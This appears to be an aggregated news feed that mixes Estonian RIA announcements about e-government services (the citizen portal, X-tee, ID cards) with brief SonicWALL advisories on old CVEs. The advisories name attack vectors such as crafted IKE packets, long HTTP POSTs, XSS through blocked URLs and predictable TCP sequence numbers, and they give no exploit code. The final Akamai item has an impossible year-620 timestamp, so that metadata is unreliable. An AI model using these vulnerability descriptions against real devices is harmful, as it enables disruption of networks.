Jaanuaris 2005 möödus kolm aastat esimese ID-kaardi väljaandmisest Eestis. Sellega seoses hakkavad aeguma ka kaardil olevad sertifikaadid, mis on kehtivad samuti kolm aastat. Kui esialgsed sertifikaadid on igale ID-kaardile kantud juba selle tootmise käigus, siis sertifikaatide aegumisel tuleb neid igaühel ise uuendada.

https://ria.ee/uudised/ametliku-eestiee-aadressi-saab-nuud-ka-kujul-eesnimiperenimieestiee
Kodanikuportaalist saab infot planeeritavate elektrikatkestuste kohta
2005-01-05T22:00:00Z | 1104962400

Alates 6. jaanuarist on võimalik Kodanikuportaali vahendusel saada operatiivselt infot planeeritavate elektrikatkestuste kohta huvi pakkuvates piirkondades. Lahendus võimaldab portaali tuvastatud kasutajatel kaardile klikates märkida informatsiooni saamiseks neile olulised asukohad ning valida info liigi ja saamise viisi. Info saadetakse kasutajale operatiivselt e-postiga ning tulevikus loodetavasti ka SMS-ga.

https://ria.ee/uudised/kodanikuportaalist-saab-infot-planeeritavate-elektrikatkestuste-kohta
Riigi infosüsteemide haldussüsteemist
2004-12-31T22:00:00Z | 1104530400

Vabariigi Valitsuse 30. juuni 1998. a määruse nr 150 ""Andmekogude riikliku registri asutamine" muutmine" kohaselt toimib andmekogude riiklik register 2005. aastast uues infotehnoloogilises keskkonnas ning kannab nime Riigi infosüsteemide haldussüsteem (RIHA).

https://ria.ee/uudised/riigi-infosusteemide-haldussusteemist
Uus teenus Kodanikuportaalis
2004-11-09T22:00:00Z | 1100037600

Avatud on uus teenus Kodanikuportaalis www.eesti.ee.

https://ria.ee/uudised/uus-teenus-kodanikuportaalis
Avati Teabeportaali venekeelne versioon
2004-11-09T22:00:00Z | 1100037600

Alates novembrist on avatud Teabeportaali venekeelne versioon aadressil www.eesti.ee/rus.

https://ria.ee/uudised/avati-teabeportaali-venekeelne-versioon
Arutati ID-kaardi laialdasema kasutamise võimalusi
2004-10-12T21:00:00Z | 1097614800

Riigi Infosüsteemide Arenduskeskus korraldas 13. oktoobril arvutifirmade juhtidele kohtumise, kus arutati, kuidas suurendada ID-kaardiga e-teenuseid kasutavate inimeste arvu.

https://ria.ee/uudised/arutati-id-kaardi-laialdasema-kasutamise-voimalusi
Kodanikuportaali kaudu saab taotleda Euroopa ravikindlustuskaarti
2004-08-01T21:00:00Z | 1091394000

Alates 1. augustist saab kodanikuportaali www.eesti.ee kaudu taotleda Euroopa ravikindlustuskaarti. Euroopa ravikindlustuskaart annab õiguse vajaminevale arstiabile Euroopa Liidu territooriumil ja Euroopa Majandusühenduse piirkonnas viibimise ajal.

https://ria.ee/uudised/kodanikuportaali-kaudu-saab-taotleda-euroopa-ravikindlustuskaarti
Kodanikuportaali vahendusel saab tutvuda oma riigieksamite tulemustega
2004-06-08T21:00:00Z | 1086728400

Nüüd on kõigil gümnaasiumilõpetajatel võimalik kodanikuportaali vahendusel teada saada oma riigieksamite tulemused.

https://ria.ee/uudised/kodanikuportaali-vahendusel-saab-tutvuda-oma-riigieksamite-tulemustega
Uus teenus Kodanikuportaalis
2004-05-16T21:00:00Z | 1084741200

Nüüd on ka kodanikuportaali vahendusel võimalik kodanikul vaadata, kes on huvi tundnud tema andmete vastu KMA andmebaasis.

https://ria.ee/uudised/uus-teenus-kodanikuportaalis-KMA
Uus teenus Kodanikuportaalis
2004-03-24T22:00:00Z | 1080165600

Nüüd saavad kõik inimesed läbi kodanikuportaali www.eesti.ee ligi neid puudutavatele täitemenetluse andmetele.

https://ria.ee/uudised/uus-teenus-kodanikuportaalis-taitemenetlus
Vanemahüvitist saab taotleda internetis
2004-02-02T22:00:00Z | 1075759200

Nüüd on kõigil internetti ühendatud arvuteid omavatel lapsevanematel võimalik taotleda vanemahüvitist Kodanikuportaali vahendusel.

https://ria.ee/uudised/vanemahuvitist-saab-taotleda-internetis
Uued teenused Kodanikuportaalis
2004-01-11T22:00:00Z | 1073858400

Nüüd on avatud kodanikele uued teenused kodanikuportaali www.eesti.ee vahendusel.

https://ria.ee/uudised/uued-teenused-kodanikuportaalis
SonicWALL Firmware CVE-2003-1320 Denial-Of-Service Vulnerability
2003-12-31T05:00:00Z | 1072846800

SonicWALL firmware before 6.4.0.1 allows remote attackers to cause a denial of service and possibly execute arbitrary code via crafted Internet Key Exchange (IKE) response packets, possibly including (1) a large Security Parameter Index (SPI) field, (2) a large number of payloads, or (3) a long payload. CVE: CVE-2003-1320 Last updated: Sept. 5, 2008, 8:36 p.m.

https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2003-0001
SonicWALL PRO HTTP POST request denial of service
2003-12-31T05:00:00Z | 1072846800

SonicWall Pro running firmware 6.4.0.1 allows remote attackers to cause a denial of service (device reset) via a long HTTP POST to the internal interface, possibly due to a buffer overflow. CVE: CVE-2003-1490 Last updated: July 29, 2017, 1:29 a.m.

https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2003-0002
Valitsus kiitis heaks X-tee määruse
2003-12-18T22:00:00Z | 1071784800

Valitsus kiitis heaks infosüsteemide andmevahetuskihi (X-tee) rakendamise. Infosüsteemide andmevahetuskihi rakendamise eesmärgiks on kehtestada andmevahetuskihi tegevuse alused. Nimetatud eesmärk tuleneb vajadusest ühtlustada Eestis peetavate andmekogude kasutamist ja nende omavahelist suhtlemist interneti kaudu.

https://ria.ee/uudised/valitsus-kiitis-heaks-x-tee-maaruse
Laienesid võimalused Haigekassaga suhtlemiseks X-tee vahendusel
2003-11-24T22:00:00Z | 1069711200

Kui tänaseni oli võimalik Haigekassa infosüsteemiga suhelda X-tee vahendusel vaid kodanikel läbi kodanikportaali www.eesti.ee, siis täna kiideti heaks arendustööd, mille käigus valmisid uued teenused Haigekassa infosüsteemiga suhtlemiseks ka ametnikele ning teistele infosüsteemidele.

https://ria.ee/uudised/laienesid-voimalused-haigekassaga-suhtlemiseks-x-tee-vahendusel
Kodanikuportaali vahendusel saab taotleda ravimihüvitist
2003-10-09T21:00:00Z | 1065733200

Kodanikuportaali vahendusel on nüüd võimalus vaadata ja muuta oma andmeid Haigekassa infosüsteemis ning taotleda täiendavat ravimihüvitist.

https://ria.ee/uudised/kodanikuportaali-vahendusel-saab-taotleda-ravimihuvitist
Riigi Infosüsteemide Arenduskeskuse direktor on Epp Joab
2003-05-24T21:00:00Z | 1053810000

Alates 26. maist asub Riigi Infosüsteemide Arenduskeskuse (RIA) direktorina ametisse Epp Joab.

https://ria.ee/uudised/riigi-infosusteemide-arenduskeskuse-direktor-epp-joab
Riigi Infosüsteemide Arenduskeskusest
2003-05-07T21:00:00Z | 1052341200

Riigi Infosüsteemide Arenduskeskuse (RIA) tegevuse eesmärk on riigi infosüsteemide koordineeritud arengu korraldamine ning riigiasutustele mitmesuguste informaatikaalaste teenuste pakkumine, samuti korraldatakse pakkumismenetlusi riigihangete teostamiseks.

https://ria.ee/uudised/riigi-infosusteemide-arenduskeskusest
Eesti informaatikakeskus lõpetas tegevuse
2003-05-04T21:00:00Z | 1052082000

Alates tänasest on Eesti Informaatikakeskuse tegevus lõppenud. Vabariigi Valitsuse 4. märtsil 2003 tehtud otsuse kohaselt moodustatakse Eesti Informaatikakeskuse ja Riigihangete Keskuse liitmisel uus asutus Riigi Infosüsteemide Arenduskeskus

https://ria.ee/uudised/eesti-informaatikakeskus-lopetas-tegevuse
Arvutimaailm 10x10
2003-04-23T21:00:00Z | 1051131600

Eesti Informaatikakeskuse poolt välja antav Eesti esimene infotehnoloogia ajakiri Arvutimaailm sai kümne aastaseks ning kokku on trükivalgust näinud juba sada numbrit.

https://ria.ee/uudised/arvutimaailm-10x10
Kodanikuportaal avatud
2003-03-11T22:00:00Z | 1047420000

Tänasest on avatud kodaniku IT-keskkond (KIT), mis võimaldab inimestel saada teavet oma õigustest ja kohustustest ning osaleda infotehnoloogia abil aktiivselt avalikus elus nii riigi, regiooni kui ka kohalikul tasandil.

https://ria.ee/uudised/kodanikuportaal-avatud
Eesti on maailma e-riikide paremikus
2003-02-21T22:00:00Z | 1045864800

Värske World Economic Forumi uuring hindab kõrgelt Eesti riigi infosüsteemide arengut ja senist infopoliitikat. Eesti on valitsussektori infotehnoloogilise valmiduse poolest paigutatud maailma riikide hulgas 13. kohale ning avalikus halduses infotehnoloogia tegeliku rakendamise indeksi järgi koguni 8. kohale.

https://ria.ee/uudised/eesti-maailma-e-riikide-paremikus
SonicWALL SOHO3 blocked URL log file script injection
2002-12-31T05:00:00Z | 1041310800

Cross-site scripting (XSS) vulnerability in content blocking in SonicWALL SOHO3 6.3.0.0 allows remote attackers to inject arbitrary web script or HTML via a blocked URL. CVE: CVE-2002-2341 Last updated: Sept. 5, 2008, 8:32 p.m.

https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2002-0002
SonicWALL Content Filtering IP addresses can bypass URL filtering
2002-12-31T05:00:00Z | 1041310800

SonicWall Content Filtering allows local users to access prohibited web sites via requests to the web site's IP address instead of the domain name. CVE: CVE-2002-2181 Last updated: Sept. 5, 2008, 8:32 p.m.

https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2002-0001
PeaTee laienemine jätkub
2002-10-16T21:00:00Z | 1034802000

Viimase kuu jooksul on oluliselt suurenenud riigiasutuste andmeside magistraalvõrgu PeaTee kanalite kiirused.

https://ria.ee/uudised/peatee-laienemine-jatkub
Raamleping Microsoftiga
2002-10-08T21:00:00Z | 1034110800

Täna kell 13.00 tutvustavad Eesti Informaatikakeskuse direktor Imre Siil ja Microsofti Baltikumi regiooni juht Torben Andersen Eesti riigi ja Microsofti vahel sõlmitud raamlepingut. Pressikonverents peetakse Eesti Informaatikakeskuse nõupidamiste ruumis Rahukohtu 2.

https://ria.ee/uudised/raamleping-microsoftiga
eContenti programm Eesile avatud
2002-09-19T21:00:00Z | 1032469200

Täna kirjutavad Euroopa Liidu ettevõtluse ja infoühiskonna volinik Erkki Liikanen ning Eesti majandus ning teede- ja sideminister alla memorandumile, mis sätestab Eesti osalemise Euroopa Ühenduse eContenti programmis. Selle eesmärgiks on digitaalse infosisu tootmise, levitamise ja kasutamise edendamine.

https://ria.ee/uudised/econtenti-programm-eesile-avatud
Peatee kanalid laienevad
2002-08-29T21:00:00Z | 1030654800

Augustikuu jooksul on oluliselt suurenenud riigiasutuste andmeside magistraalvõrgu PeaTee kanalite kiirused.

https://ria.ee/uudised/peatee-kanalid-laienevad
Peateel kiiremad ühendused
2002-06-30T21:00:00Z | 1025470800

Peatee ühendus teiste Eesti interneti teenusepakkujatega toimub nüüd kiirusel 1Gbps, seega on uus ühendus 10 korda kiirem.

https://ria.ee/uudised/peateel-kiiremad-uhendused
X-tee parimate projektide hulgas
2002-06-04T21:00:00Z | 1023224400

Sloveenia pealinnas Ljubljanas peetud Euroopa infoühiskonna ministrite konverentsil "Connecting Europe" esitati Kesk- ja Ida-Euroopa parimate arendustööde hulgas ka X-tee projekt, mille tulemusel kujunenud andmevahenduskihti haldab Eesti Informaatikakeskus.

https://ria.ee/uudised/x-tee-parimate-projektide-hulgas
Koostöölepped nelja internetipangaga
2002-05-08T21:00:00Z | 1020891600

Eesti Informaatikakeskus ja Sampo Pank sõlmisid lepingu andmevahenduskihi (X-tee) kodanikuportaali kasutajate autentimiseks-autoriseerimiseks Sampo Panga internetipanga kaudu.

https://ria.ee/uudised/koostoolepped-nelja-internetipangaga
Andmevahenduskihiga (X-tee) liitus riiklik liiklusregister
2002-05-01T21:00:00Z | 1020286800

Andmevahenduskihiga (X-tee) liitus riiklik liiklusregister.

https://ria.ee/uudised/andmevahenduskihiga-x-tee-liitus-riiklik-liiklusregister
Koostöö internetipankadega laieneb
2002-03-18T22:00:00Z | 1016488800

Eesti Informaatikakeskus ja Krediidipank sõlmisid lepingu andmevahenduskihi (X-tee) kodanikuportaali kasutajate autentimiseks-autoriseerimiseks Krediidipanga internetipanga kaudu. Esimene analoogne kokkulepe sõlmiti Hansapangaga, allakirjutamisel on leping Ühispangaga.

https://ria.ee/uudised/koostoo-internetipankadega-laieneb
Baltimaade ühine infoühiskonna ajakiri
2002-03-14T22:00:00Z | 1016143200

Ilmunud on rahvusvahelise ajakirja Baltic IT&T Review selle aasta esimene number, milles räägitakse Balti riikide infoühiskonna arengust ja tähtsamatest sündmustest.

https://ria.ee/uudised/baltimaade-uhine-infouhiskonna-ajakiri
OECD eksperdid analüüsivad Eesti e-riigi projekte
2002-03-12T22:00:00Z | 1015970400

Pariisis OECD e-valitsuse projekti raames peetud ekspertnõupidamisel käsitleti e-valitsuse arengut ja selle mõju ühiskondlikele protsessidele ning riigi erinevatele sektoritele. OECD maade kõrval võeti vaatluse alla ka mõningate teiste riikide saavutused. Ainukese Ida- ja Kesk-Euroopa riigina oli esindatud Eesti, kutsutud eksperdina osales Eesti Informaatikakeskuse direktor Imre Siil.

https://ria.ee/uudised/oecd-eksperdid-analuusivad-eesti-e-riigi-projekte
eContent
2002-02-18T22:00:00Z | 1014069600

Euroopa Komisjon on kutsunud Eestit liituma programmiga eContent.

https://ria.ee/uudised/econtent
PeaTee kiirused kasvavad
2002-02-12T22:00:00Z | 1013551200

Riigiasutuste andmesidemagistraali PeaTee andmeedastuskiirus Tallinna ja Jõhvi vahel on nüüd 4 Mb/s, mis leevendab üha suurenevat koormust sellel suunal.

https://ria.ee/uudised/peatee-kiirused-kasvavad
Esimene leping Kodanikuportaali rakendamiseks
2002-02-05T22:00:00Z | 1012946400

Eesti Informaatikakeskus ja Hansapank sõlmisid lepingu andmekogude integratsioonisüsteemi (X-tee) kodanikuportaali kaudu päringuid tegevate Hansapanga Interentipanga klientide autentimiseks-autoriseerimiseks.

https://ria.ee/uudised/esimene-leping-kodanikuportaali-rakendamiseks
Käivitati uus töösuund – X-tee
2002-01-14T22:00:00Z | 1011045600

Eesti Informaatikakeskuses on alustanud tööd andmekogude integratsiooni üksus.

https://ria.ee/uudised/kaivitati-uus-toosuund-x-tee
SonicWALL SOHO Firewall Predictable TCP Initial Sequence Number Vulnerability
2001-07-25T04:00:00Z | 996033600

SonicWALL SOHO uses easily predictable TCP sequence numbers, which allows remote attackers to spoof or hijack sessions. CVE: CVE-2001-1104 Last updated: Sept. 5, 2008, 8:25 p.m.

https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2001-0002
Tele2 CVE-2001-0376 Remote Security Vulnerability
2001-06-18T04:00:00Z | 992836800

SonicWALL Tele2 and SOHO firewalls with 6.0.0.0 firmware using IPSEC with IKE pre-shared keys do not allow for the use of full 128 byte IKE pre-shared keys, which is the intended design of the IKE pre-shared key, and only support 48 byte keys. This allows a remote attacker to brute force attack the pre-shared keys with significantly less resources than if the full 128 byte IKE pre-shared keys were used. CVE: CVE-2001-0376 Last updated: Dec. 19, 2017, 2:29 a.m.

https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2001-0001
Soho Firewall CVE-2000-1098 Denial-Of-Service Vulnerability
2001-01-09T05:00:00Z | 979016400

The web server for the SonicWALL SOHO firewall allows remote attackers to cause a denial of service via an empty GET or POST request. CVE: CVE-2000-1098 Last updated: Sept. 5, 2008, 8:22 p.m.

https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2000-0002
SonicWALL SOHO username denial of service
2001-01-09T05:00:00Z | 979016400

The web server for the SonicWALL SOHO firewall allows remote attackers to cause a denial of service via a long username in the authentication page. CVE: CVE-2000-1097 Last updated: Oct. 10, 2017, 1:29 a.m.

https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2000-0001
Strategy for the Office Anywhere
620-11-01T12:56:00Z | -42575540640

Organizations must deploy a remote working strategy that suits the office anywhere model CIOs need to demonstrate leadership as we move out of lockdown into a new model of working in which the office is wherever the employee is. It?s time to build on this initial success and embed a remote working strategy within organizations.

https://www.akamai.com/blog/security/strategy-for-the-office-anywhere